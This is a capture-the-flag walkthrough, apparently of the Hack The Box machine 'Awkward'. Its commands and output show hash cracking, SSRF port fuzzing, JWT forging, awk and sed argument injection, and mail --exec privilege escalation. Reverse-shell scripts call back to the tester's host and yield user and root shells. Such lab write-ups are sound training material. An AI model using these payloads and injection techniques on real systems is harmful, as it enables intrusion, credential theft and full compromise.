# NMAP

```
Nmap scan report for 10.129.228.81
Host is up, received echo-reply ttl 63 (0.12s latency).
Scanned at 2022-11-09 23:21:11 EST for 10s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 7254afbaf6e2835941b7cd611c2f418b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCMaN1wQtPg5uk2w3xD0d0ND6JQgzw40PoqCSBDGB7Q0/f5lQSGU2eSTw4uCdL99hdM/+Uv84ffp2tNkCXyV8l8=
|   256 59365bba3c7821e326b37d23605aec38 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFsq9sSC1uhq5CBWylh+yiC7jz4tuegMj/4FVTp6bzZy
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# ENUM WEB APP

```
┌──(root㉿kali)-[~/htb/Box/Windows/Awkward]
└─# wget http://hat-valley.htb/js/app.js                                              
--2022-11-09 23:28:03--  http://hat-valley.htb/js/app.js
Resolving hat-valley.htb (hat-valley.htb)... 10.129.228.81
Connecting to hat-valley.htb (hat-valley.htb)|10.129.228.81|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 430202 (420K) [application/javascript]
Saving to: ‘app.js’

app.js                               100%[===================================================================>] 420.12K   112KB/s    in 3.7s    

2022-11-09 23:28:08 (112 KB/s) - ‘app.js’ saved [430202/430202]
```

```
http://store.hat-valley.htb
http://hat-valley.htb/hr/
http://hat-valley.htb/api/staff-details
```

```
/var/www/hat-valley.htb/node_modules/webpack/hot/dev-server.js
```

```
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony import */ var axios__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! axios */ \"./node_modules/axios/index.js\");\n/* harmony import */ var axios__WEBPACK_IMPORTED_MODULE_0___default = /*#__PURE__*/__webpack_require__.n(axios__WEBPACK_IMPORTED_MODULE_0__);\n\naxios__WEBPACK_IMPORTED_MODULE_0___default.a.defaults.withCredentials = true;\nvar baseURL = \"/api/\";\n\nvar staff_details = function staff_details() {\n  return axios__WEBPACK_IMPORTED_MODULE_0___default.a.get(baseURL + 'staff-details').then(function (response) {\n    return response.data;\n  });\n};
```

# GET USERNAMES AND PASSWORDS

```
┌──(root㉿kali)-[~/htb/Box/Windows/Awkward]
└─# curl http://hat-valley.htb/api/staff-details | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   775  100   775    0     0   3051      0 --:--:-- --:--:-- --:--:--  3063
[
  {
    "user_id": 1,
    "username": "christine.wool",
    "password": "6529fc6e43f9061ff4eaa806b087b13747fbe8ae0abfd396a5c4cb97c5941649",
    "fullname": "Christine Wool",
    "role": "Founder, CEO",
    "phone": "0415202922"
  },
  {
    "user_id": 2,
    "username": "christopher.jones",
    "password": "e59ae67897757d1a138a46c1f501ce94321e96aa7ec4445e0e97e94f2ec6c8e1",
    "fullname": "Christopher Jones",
    "role": "Salesperson",
    "phone": "0456980001"
  },
  {
    "user_id": 3,
    "username": "jackson.lightheart",
    "password": "b091bc790fe647a0d7e8fb8ed9c4c01e15c77920a42ccd0deaca431a44ea0436",
    "fullname": "Jackson Lightheart",
    "role": "Salesperson",
    "phone": "0419444111"
  },
  {
    "user_id": 4,
    "username": "bean.hill",
    "password": "37513684de081222aaded9b8391d541ae885ce3b55942b9ac6978ad6f6e1811f",
    "fullname": "Bean Hill",
    "role": "System Administrator",
    "phone": "0432339177"
  }
]
```

# CRACK HASH

```
┌──(root㉿kali)-[~/htb/Box/Windows/Awkward]
└─# hashcat -m 1400 hashes.txt /usr/share/wordlists/rockyou.txt --quiet                     
e59ae67897757d1a138a46c1f501ce94321e96aa7ec4445e0e97e94f2ec6c8e1:chris123
```

```
christopher.jones : chris123
```

# LOGIN WEB PAGE

```
http://hat-valley.htb/hr/
```

# SSRF

```
GET /api/store-status?url="http://127.0.0.1" HTTP/1.1
Host: hat-valley.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://hat-valley.htb/dashboard
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNocmlzdG9waGVyLmpvbmVzIiwiaWF0IjoxNjY4NTUwMDM2fQ.JsP2LFlbnk3LRrdxo-ChuM_AwdJlNmzhW_ha5BtBkFI
```

# FUZZING PORTS

```
┌──(root㉿kali)-[~/htb/Box/Linux/Awkward]
└─# ffuf -w /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt -u 'http://hat-valley.htb/api/store-status?url="http://127.0.0.1:FUZZ"' -fs 0 


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://hat-valley.htb/api/store-status?url="http://127.0.0.1:FUZZ"
 :: Wordlist         : FUZZ: /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

0080                    [Status: 200, Size: 132, Words: 6, Lines: 9, Duration: 125ms]
3002                    [Status: 200, Size: 77010, Words: 5916, Lines: 686, Duration: 165ms]
8080                    [Status: 200, Size: 2881, Words: 305, Lines: 55, Duration: 128ms]
:: Progress: [10000/10000] :: Job [1/1] :: 313 req/sec :: Duration: [0:00:33] :: Errors: 0 ::
```

# API DOCUMENTATION

```
GET /api/store-status?url="http://127.0.0.1:3002" HTTP/1.1
Host: hat-valley.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://hat-valley.htb/dashboard
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNocmlzdG9waGVyLmpvbmVzIiwiaWF0IjoxNjY4NTUwMDM2fQ.JsP2LFlbnk3LRrdxo-ChuM_AwdJlNmzhW_ha5BtBkFI
```

# AWK LFI

```js
app.get('/api/all-leave', (req, res) => {
  const user_token = req.cookies.token
  var authFailed = false
  var user = null

  if(user_token) {
    const decodedToken = jwt.verify(user_token, TOKEN_SECRET)
    if(!decodedToken.username) {
      authFailed = true
    }
    else {
      user = decodedToken.username
    }
  }

  if(authFailed) {
    return res.status(401).json({Error: "Invalid Token"})
  }

  if(!user) {
    return res.status(500).send("Invalid user")
  }

  const bad = [";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"]
  const badInUser = bad.some(char => user.includes(char));

  if(badInUser) {
    return res.status(500).send("Bad character detected.")
  }

  exec("awk '/" + user + "/' /var/www/private/leave_requests.csv", {encoding: 'binary', maxBuffer: 51200000}, (error, stdout, stderr) => {
    if(stdout) {
      return res.status(200).send(new Buffer(stdout, 'binary'));
    }
```

# CRACK JWT PASSWORD

```
┌──(root㉿kali)-[~/htb/Box/Linux/Awkward]
└─# /opt/gojwtcrack -t jwt.txt -d /usr/share/wordlists/rockyou.txt 
123beany123     eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNocmlzdG9waGVyLmpvbmVzIiwiaWF0IjoxNjY4NTUwMDM2fQ.JsP2LFlbnk3LRrdxo-ChuM_AwdJlNmzhW_ha5BtBkFI
```

# MODIFY TOKEN

```
{
  "username": "/' /etc/passwd '",
  "iat": 1668550036
}
```

# READ FILES

```
GET /api/all-leave HTTP/1.1
Host: hat-valley.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ldGMvcGFzc3dkICciLCJpYXQiOjE2Njg1NTAwMzZ9.DIw6kbnBbgCtqWtKa215eXRkFVjjEkvaPiHlHFMXerc
```

```
root:x:0:0:root:/root:/bin/bash
bean:x:1001:1001:,,,:/home/bean:/bin/bash
christine:x:1002:1002:,,,:/home/christine:/bin/bash
```

`/' /home/bean/.bashrc '`
```
# custom
alias backup_home='/bin/bash /home/bean/Documents/backup_home.sh'
```

`/' /home/bean/.bashrc '`
```
#!/bin/bash
mkdir /home/bean/Documents/backup_tmp
cd /home/bean
tar --exclude='.npm' --exclude='.cache' --exclude='.vscode' -czvf /home/bean/Documents/backup_tmp/bean_backup.tar.gz .
date > /home/bean/Documents/backup_tmp/time.txt
cd /home/bean/Documents/backup_tmp
tar -czvf /home/bean/Documents/backup/bean_backup_final.tar.gz .
rm -r /home/bean/Documents/backup_tmp
```

# GET BACKUP FILE

```
┌──(root㉿kali)-[~/htb/Box/Linux/Awkward]
└─# curl http://hat-valley.htb/api/all-leave --header "Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Ii8nIC9ob21lL2JlYW4vRG9jdW1lbnRzL2JhY2t1cC9iZWFuX2JhY2t1cF9maW5hbC50YXIuZ3ogJyIsImlhdCI6MTY2ODU1MDAzNn0.EYfhGvx5zgR1Lc6qxb5gjOcYcYo_rLb_7wWnGkt1sxA" --output bean_backup_final.tar.gz
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 31716  100 31716    0     0  84275      0 --:--:-- --:--:-- --:--:-- 84351
```

# DECOMPRESS TAR.GZ

```
┌──(root㉿kali)-[~/htb/Box/Linux/Awkward]
└─# tar -xzvf bean_backup_final.tar.gz 

gzip: stdin: unexpected end of file
./
./bean_backup.tar.gz
./time.txt
tar: Child returned status 1
tar: Error is not recoverable: exiting now
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Awkward]
└─# mkdir files                           
                                                                                                                                                 
┌──(root㉿kali)-[~/htb/Box/Linux/Awkward]
└─# mv bean_backup.tar files              
                                                                                                                                                 
┌──(root㉿kali)-[~/htb/Box/Linux/Awkward]
└─# cd files                    
                                                                                                                                                 
┌──(root㉿kali)-[~/…/Box/Linux/Awkward/files]
└─# tar -xvf bean_backup.tar
./
./Templates/
./.ssh/
./Pictures/
./.config/
./.config/xpad/
./.config/xpad/info-GQ1ZS1
```

# GET PASSWORD BEAN

```
┌──(root㉿kali)-[~/…/Box/Linux/Awkward/files]
└─# cat .config/xpad/content-DS1ZS1 
TO DO:
- Get real hat prices / stock from Christine
- Implement more secure hashing mechanism for HR system
- Setup better confirmation message when adding item to cart
- Add support for item quantity > 1
- Implement checkout system

boldHR SYSTEM/bold
bean.hill
014mrbeanrules!#P

https://www.slac.stanford.edu/slac/www/resource/how-to-use/cgi-rexx/cgi-esc.html

boldMAKE SURE TO USE THIS EVERYWHERE ^^^/bold 
```

# SSH CONNECT

```
bean : 014mrbeanrules!#P
```

```
┌──(root㉿kali)-[~/…/Box/Linux/Awkward/files]
└─# ssh bean@10.129.228.81
bean@10.129.228.81's password: 
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-52-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Nov 16 10:33:46 2022 from 10.10.14.111
bean@awkward:~$ cat user.txt 
74535c502c41575eeb72821193a6150c
bean@awkward:~$
```

# ACCESS STORE SUBDOMAIN

```
GET / HTTP/1.1
Host: store.hat-valley.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46MDE0bXJiZWFucnVsZXMhI1A=
```

```
bean@awkward:/var/www/store$ echo 'YWRtaW46MDE0bXJiZWFucnVsZXMhI1A=' | base64 -d
admin:014mrbeanrules!#P
```

# STORE WEB PAGE SED VULN

```
bean@awkward:/var/www/store$ cat cart_actions.php
if(checkValidItem("{$STORE_HOME}cart/{$user_id}")) {
        system("sed -i '/item_id={$item_id}/d' {$STORE_HOME}cart/{$user_id}");
        echo "Item removed from cart";
    }
    else {
        echo "Invalid item";
    }
    exit;
```

# SHELL AS WWW-DATA

## MAKE REV SHELL FILE

```
bean@awkward:/var/www/store$ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.14.111/1234 0>&1' > /tmp/doom.sh
bean@awkward:/var/www/store$ cat /tmp/doom.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.111/1234 0>&1
bean@awkward:/var/www/store$ chmod +x /tmp/doom.sh
```

## ADD ITEM TO CART

```
POST /cart_actions.php HTTP/1.1
Host: store.hat-valley.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 46
Origin: http://store.hat-valley.htb
Authorization: Basic YWRtaW46MDE0bXJiZWFucnVsZXMhI1A=
Connection: close
Referer: http://store.hat-valley.htb/shop.php

item=1&user=7efb-4ee4-20c-db61&action=add_item
```

# MODIFY CART ITEM

```
bean@awkward:/var/www/store/cart$ ls -la
total 12
drwxrwxrwx 2 root     root     4096 Nov 16 11:00 .
drwxr-xr-x 9 root     root     4096 Oct  6 01:35 ..
-rw-r--r-- 1 www-data www-data   96 Nov 16 11:00 7efb-4ee4-20c-db61
bean@awkward:/var/www/store/cart$ cat 7efb-4ee4-20c-db61
***Hat Valley Cart***
item_id=1&item_name=Yellow Beanie&item_brand=Good Doggo&item_price=$39.90
```

```
bean@awkward:/var/www/store/cart$ rm -rf 7efb-4ee4-20c-db61 
bean@awkward:/var/www/store/cart$ nano 7efb-4ee4-20c-db61
bean@awkward:/var/www/store/cart$ chmod +x 7efb-4ee4-20c-db61
bean@awkward:/var/www/store/cart$ cat 7efb-4ee4-20c-db61 
***Hat Valley Cart***
item_id=1' -e "1e /tmp/doom.sh" /tmp/doom.sh '&item_name=Yellow Beanie&item_brand=Good Doggo&item_price=$39.90
bean@awkward:/var/www/store/cart$
```

# GO TO CART ITEMS

```
GET /cart_actions.php?user=7efb-4ee4-20c-db61&action=fetch_items HTTP/1.1
Host: store.hat-valley.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Authorization: Basic YWRtaW46MDE0bXJiZWFucnVsZXMhI1A=
Connection: close
Referer: http://store.hat-valley.htb/cart.php
```

# REMOVE ITEM AND MODIFY THE REQUEST

```
POST /cart_actions.php HTTP/1.1
Host: store.hat-valley.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://store.hat-valley.htb
Authorization: Basic YWRtaW46MDE0bXJiZWFucnVsZXMhI1A=
Connection: close
Referer: http://store.hat-valley.htb/cart.php

item=1'+-e+"1e+/tmp/doom.sh"+/tmp/doom.sh+'&user=7efb-4ee4-20c-db61&action=delete_item
```

# GET REV SHELL

```
┌──(root㉿kali)-[~/htb/Box/Linux/Awkward]
└─# nc -lvnp 1234                
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.129.228.81.
Ncat: Connection from 10.129.228.81:41270.
bash: cannot set terminal process group (1282): Inappropriate ioctl for device
bash: no job control in this shell
www-data@awkward:~/store$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@awkward:~/store$
```

# RUN PSPY64

```
2022/11/16 11:19:11 CMD: UID=0    PID=1006   | /bin/bash /root/scripts/notify.sh 
2022/11/16 11:19:11 CMD: UID=0    PID=1005   | inotifywait --quiet --monitor --event modify /var/www/private/leave_requests.csv
2022/11/16 11:20:01 CMD: UID=0    PID=4491   | mail -s Leave Request:  christine
```

# PRIV ESC MAIL

```
www-data@awkward:~/private$ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.14.111/4444 0>&1' > /tmp/doom2.sh
www-data@awkward:~/private$ chmod +x /tmp/doom2.sh
www-data@awkward:~/private$ cat /tmp/doom2.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.111/4444 0>&1
```

```
www-data@awkward:~/private$ echo '" --exec="\!/tmp/doom2.sh"' >> leave_requests.csv
www-data@awkward:~/private$
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Awkward]
└─# nc -lvnp 4444                    
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.228.81.
Ncat: Connection from 10.129.228.81:50876.
bash: cannot set terminal process group (992): Inappropriate ioctl for device
bash: no job control in this shell
root@awkward:~/scripts# cat /root/root.txt
cat /root/root.txt
89f742177edd210ff351a2ec55b961be
root@awkward:~/scripts#
```

# REFERENCES
https://github.com/x1sec/gojwtcrack \
https://gtfobins.github.io/gtfobins/sed/ \
https://gtfobins.github.io/gtfobins/mail/